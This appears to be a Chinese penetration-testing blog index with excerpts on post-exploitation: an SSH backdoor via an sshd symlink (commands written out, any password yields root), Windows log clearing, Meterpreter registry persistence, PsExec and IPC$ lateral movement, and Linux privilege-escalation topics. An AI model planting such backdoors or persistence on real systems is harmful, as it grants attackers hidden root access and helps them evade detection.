0%

/01 SSH后门,VIM后门

一,软链接

1
2
#!bash
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oport=12345

image-20210103200837650

1
ssh root@192.168.79.131 -p 12345

image-20210103200832235

输入任意密码就可以root用户权限登陆,如果root用户被禁止登陆时,可以利用其他存在的用户身份登陆

阅读全文 »

/01 痕迹清除简介

在渗透测试过程中,Windows日志往往会记录系统上的敏感操作,如添加用户,远程登录,执行命令等。攻击者 通常会对Windows日志进行清除和绕过。

阅读全文 »

前置,windows域内认证机制

https://payloads.online/archivers/2018-11-30/1

https://www.cnblogs.com/backlion/p/8127868.html

https://www.cnblogs.com/xiaoxiaosen/p/13535868.html

http://www.vuln.cn/6816

https://xz.aliyun.com/t/7432

一下内容来源于刘师傅的(我仅作演示和部分理解):

https://note.youdao.com/ynoteshare1/index.html?id=a9b800169e5c24dc57110e35e3cb7d90&type=note

阅读全文 »

/01 Meterpreter权限维持

一,Persistence模块

1.1原理

上传vbs脚本,用来修改注册表信息:

在HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run添加从而完成自启动

也有可能在

image-20210101172340215

优点:

开机自启,持久控制不需要认证

缺点:

容易被杀软查杀,任何人都可连接

阅读全文 »

/01 Psexec

一,Psexec简介

PsExec是一种轻巧的telnet替代品,可让您在其他系统上执行进程,并为控制台应用程序提供完整的交互性,而 无需手动安装客户端软件。

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec

原理:

  1. IPC$连接,释放Psexesvc.exe
  2. OpenSCManager打开受害者机器上服务控制管理器的句柄
  3. CreateService创建服务
  4. 获取服务句柄OpenService使用StartService启动服务
阅读全文 »

/01 IPC+Schtasks

一,IPC$简介

IPC$ (Internet Process Connection) 是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通 过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程 计算机的访问。

二,利用条件

  1. 开发端口139,445端口
  2. 目标开启IPC$文件共享服务
  3. 需要目标机器的管理员账号和密码
阅读全文 »

/01 滥用的SUDO权限

/02 Linux定时任务提权

/03 SUID提权

/04 Other